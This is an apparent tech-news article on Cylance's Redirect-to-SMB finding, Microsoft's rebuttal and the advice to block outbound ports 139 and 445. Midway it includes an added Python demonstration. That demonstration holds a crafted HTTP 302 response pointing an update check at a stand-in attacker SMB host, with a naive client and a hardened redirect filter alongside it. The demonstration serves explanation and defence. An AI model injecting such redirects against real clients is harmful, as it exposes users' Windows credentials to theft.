Redirect to SMB Attack Can Exploit Windows Users, Report Finds

Microsoft, however, denies security vendor Cylance's claims that there is in fact a new attack type.


Security vendor Cylance today is warning of a potential vulnerability that enables an attacker to use the Server Message Block (SMB) protocol to exploit Windows users and applications. Microsoft, however, is downplaying the risk and doesn't entirely agree with Cylance's assessment of the issue.

Cylance worked with CERT to properly disclose and report the flaw to Microsoft and other impacted application vendors.

"Many software products use HTTP requests for various features such as software update checking," CERT warns in its advisory. "A malicious user can intercept such requests (such as with a MITM proxy) and use HTTP Redirect to redirect the victim [to] a malicious SMB server."

CERT notes in its advisory that it is unaware of a complete solution to the problem, though there are workarounds that limit risk.

Microsoft doesn't consider the Redirect to SMB issue to be a new risk. "We don’t agree with Cylance's claims of a new attack type," a Microsoft spokesperson wrote in an email to eWEEK. "Several factors would need to come together for this type of cyber attack to work, such as success in luring a person to enter information into a fake website. We encourage people to avoid opening links in emails from senders that they don't recognize or visiting unsecure sites."

Brian Wallace, senior researcher at Cylance, does consider Redirect to SMB a significant issue. The Redirect to SMB attack builds on an attack first discussed in 1997, in which an attacker could craft a link that, once clicked, forced the user's machine to connect to a remote SMB server, he said.

"By default, when Windows connects out to an SMB Windows file server, Windows will attempt to authenticate," Wallace told eWEEK. "This new Redirect to SMB issue builds on that by allowing applications that connect over HTTP to be redirected to SMB that could potentially be malicious."

In the original 1997 issue, according to Wallace, Internet Explorer was required to be used to view a Web page that might then lead the user to a malicious SMB server. With the Redirect to SMB attack, application updating mechanisms are also at risk. In some limited testing, Wallace found that at least 30 applications were potentially vulnerable to a Redirect to SMB attack, including the Apple updater for iTunes and Adobe's updater for Reader.
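The mechanism CERT and Wallace describe above, as an added example that is not code from Cylance, CERT or any of the vendors named in the article: a constructed 302 response of the kind an on-path attacker could inject into an update check, a naive client that follows the Location header wherever it points, and a hardened redirect policy that refuses file:// and UNC targets and off-host hops. The update endpoint updates.example.com and the attacker address 203.0.113.5 (a documentation address) are assumptions for the demo; the code uses only the Python standard library.

```python
"""Redirect-to-SMB demonstration: how a 302 to a file:// URL turns an HTTP
update check into an outbound SMB connection, and a redirect policy that
refuses it. Added example; nothing here is a capture from a real product."""
from urllib.parse import urlsplit, urljoin

# Hypothetical update endpoint the victim application polls over plain HTTP.
UPDATE_URL = "http://updates.example.com/check"

# Constructed response an on-path attacker (or rogue proxy) could return in
# place of the real server's answer. 203.0.113.5 stands in for the attacker's
# SMB server; Windows resolves file://host/share as the UNC path \\host\share
# and authenticates to it automatically with the logged-on user's credentials.
MALICIOUS_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: file://203.0.113.5/updates/latest.exe\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

# Constructed benign redirect from the same server, for comparison.
BENIGN_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: /v2/check\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

REDIRECT_CODES = (301, 302, 303, 307, 308)


def parse_response(raw: bytes):
    """Return (status_code, headers) parsed from a raw HTTP/1.x response head."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def is_unc_like(target: str) -> bool:
    """True when a redirect target would be handed to the Windows SMB redirector:
    a file:// URL naming a remote host, or a bare UNC path starting with two
    backslashes. A file:/// URL with no host is a local path and is not flagged."""
    if target.startswith("\\\\"):
        return True
    parts = urlsplit(target)
    return parts.scheme.lower() == "file" and bool(parts.netloc)


def naive_follow(current_url: str, raw: bytes):
    """What a client that trusts Location blindly does: resolve it and go there.
    Returns the URL the client would fetch next, or None if not a redirect."""
    status, headers = parse_response(raw)
    if status in REDIRECT_CODES and "location" in headers:
        return urljoin(current_url, headers["location"])
    return None


def safe_follow(current_url: str, raw: bytes, allowed_hosts=frozenset()):
    """Hardened redirect handling: only http(s), never file:// or UNC, and only
    to the origin host or an explicit allowlist. Raises ValueError on refusal."""
    status, headers = parse_response(raw)
    if status not in REDIRECT_CODES or "location" not in headers:
        return None
    location = headers["location"]
    if is_unc_like(location):
        raise ValueError(f"refusing redirect to SMB-reachable target: {location}")
    target = urljoin(current_url, location)
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"refusing non-HTTP scheme: {parts.scheme}")
    trusted = allowed_hosts | {urlsplit(current_url).hostname}
    if parts.hostname not in trusted:
        raise ValueError(f"refusing redirect off trusted hosts: {parts.hostname}")
    return target


if __name__ == "__main__":
    print("naive client follows:", naive_follow(UPDATE_URL, MALICIOUS_RESPONSE))
    try:
        safe_follow(UPDATE_URL, MALICIOUS_RESPONSE)
    except ValueError as err:
        print("hardened client:", err)
    print("benign redirect resolves to:", safe_follow(UPDATE_URL, BENIGN_RESPONSE))
```

The naive path shows why an HTTP-only feature such as an update check is enough to reach SMB: the client never asked for file://, but it resolves whatever Location says and Windows does the rest. The scheme and host checks in safe_follow are the fix application vendors control; the perimeter block on outbound TCP 139 and 445 that Wallace recommends later in the article is the complementary control for everything that was not fixed.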

SMB file server capabilities can also be enabled on non-Windows systems. The open-source Samba file server speaks SMB and could potentially be used in some form of Redirect to SMB attack. That said, Wallace explained that a Linux desktop user connecting to a Samba server would not be at risk, while a Windows desktop user connecting to Samba would be. The difference is how tightly coupled SMB services are within the operating system.

"Microsoft has included SMB in the core of Windows networking, while SMB is not directly integrated into the Linux kernel," he said.

Wallace did say there are a few simple steps users can take to reduce the risk of being exploited in a Redirect to SMB attack. The simplest step is to block outbound TCP ports 139 and 445 at the network perimeter.

"There are also risks inside of the network, but allowing those two ports outbound on a network is dangerous," he said.

Sean Michael Kerner is a senior editor at eWEEK. Follow him on Twitter @TechJournalist.

Sean Michael Kerner is an Internet consultant, strategist, and contributor to several leading IT business web sites.